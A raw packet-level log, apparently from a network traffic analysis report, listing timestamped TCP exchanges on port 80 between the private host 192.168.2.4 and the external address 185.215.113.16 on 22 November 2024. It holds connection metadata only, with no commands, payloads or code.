Nov 22, 2024 20:35:39.706492901 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.707423925 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.707454920 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.722042084 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.722095966 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.722117901 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.722135067 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.722563028 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.722737074 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.722774029 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.723706961 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.723830938 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.723869085 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.724848986 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.724910975 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.724961042 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.724992037 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.725963116 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.726022005 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.726072073 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.726109982 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.727060080 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.727130890 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.727161884 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.727514982 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.728254080 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.728331089 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.728357077 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.728374004 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.848032951 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.848083973 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.848134041 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.848494053 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.848532915 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.848572016 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.848634005 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.849548101 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.849611044 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.849652052 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.850614071 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.850655079 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.850743055 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.850862980 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.851758003 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.851802111 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.851849079 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.851883888 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.852930069 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.853028059 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.853069067 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.853998899 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.854043007 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.854087114 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.854527950 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.855102062 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.855185032 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.855231047 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.856281996 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.856334925 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.856443882 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.856482983 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.857379913 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.857429028 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.857438087 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.857479095 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.858577013 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.858623981 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.858647108 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.858840942 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.859659910 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.859698057 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.859765053 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.859813929 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.860785007 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.860909939 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.860953093 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.861958981 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.862112999 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.862128973 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.862454891 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.863040924 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.863164902 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.863209009 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.864200115 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.864249945 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.864409924 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.864450932 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.865334988 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.865381002 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.865406036 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.865439892 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.866434097 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.866556883 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.866595030 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.867729902 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.867808104 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.867820978 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.867974043 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.868797064 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.868846893 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.868851900 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.868891954 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.869867086 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.869985104 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.870023012 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.870970964 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.871140957 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.871182919 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.872155905 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.872279882 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.872327089 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.873262882 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.873328924 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.873363018 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.873439074 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.874382019 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.874430895 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.874506950 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.874670029 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.875549078 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.875652075 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.875657082 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.875749111 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.876631975 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.876677036 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.876750946 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.876791000 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.877770901 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.877888918 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.877935886 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.878937960 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.879014969 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.879060030 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.880167007 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.880215883 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.880256891 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.881198883 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.881246090 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.881316900 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.881354094 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.882297039 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.882390022 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.882399082 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.882436991 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.883421898 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.883474112 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.883539915 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.883582115 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.884520054 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.884614944 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.890808105 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.890836000 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.890858889 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.890878916 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.891212940 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.891257048 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.891268969 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.891359091 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.892364025 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.892446995 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.892477989 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.892529011 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.893544912 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.893593073 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.893640041 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.894637108 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.894732952 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.894785881 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.895759106 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.895802021 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.895855904 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.896491051 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.896891117 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.896939993 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.897020102 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.897064924 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.898030996 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.898117065 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.898122072 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.898155928 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.899225950 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.899291992 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.899296045 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.899825096 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.900310993 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.900367975 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.900393963 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.901216030 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.901475906 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.901515007 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.901602983 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.902127981 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.902565956 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.902667046 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.902718067 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.903719902 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.903810024 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.903862953 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.904934883 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.904989958 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.914042950 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.914060116 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.914138079 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.914191008 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.914236069 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.914288998 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.915353060 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.915400982 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.915440083 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.916472912 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.916524887 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.916529894 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.917454958 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.917622089 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.917711973 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.917787075 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.918034077 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.918746948 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.918838978 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.918865919 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.918874025 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.919857979 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.919946909 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.919987917 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.920953035 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.921845913 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.040143967 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.040216923 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.040335894 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.040616035 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.040695906 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.040741920 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.041486979 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.041543961 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.041594982 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.042115927 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.042609930 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.042649031 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.042716026 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.042757034 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.043773890 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.043814898 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.043837070 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.043874025 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.044895887 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.045007944 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.045049906 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.046022892 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.046071053 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.046116114 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.047178984 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.047220945 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.047275066 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.048335075 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.048381090 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.048470974 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.048510075 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.049626112 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.049729109 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.049768925 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.050599098 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.050671101 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.050713062 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.051697969 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.051744938 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.051892042 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.052815914 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.052860022 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.052920103 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.053922892 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.053968906 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.054114103 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.055104017 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.055154085 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.055171013 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.055202961 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.056256056 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.056371927 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.056411982 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.057347059 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.057512045 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.057563066 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.058525085 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.058610916 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.058659077 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.059627056 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.059668064 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.059739113 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.060777903 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.060818911 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.060846090 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.061891079 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.061944008 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.061983109 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.062109947 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.063033104 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.063184023 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.063218117 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.064426899 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.064565897 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.064604998 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.065279007 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.065315008 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.065407991 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.066107988 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.066391945 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.066431999 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.066461086 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.066502094 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.067595959 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.067631960 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.067661047 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.068885088 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.068919897 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.068933010 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.069813967 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.069848061 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.069940090 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.070105076 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.070933104 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.071052074 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.071093082 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.072062016 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.072184086 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.072221994 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.073208094 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.073267937 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.073313951 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.074106932 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.074347019 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.074484110 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.074527979 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.075463057 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.075529099 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.075566053 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.076562881 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.076606035 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:40.082811117 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.082828999 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:40.082863092 CET	49759	80	192.168.2.4	185.215.113.16
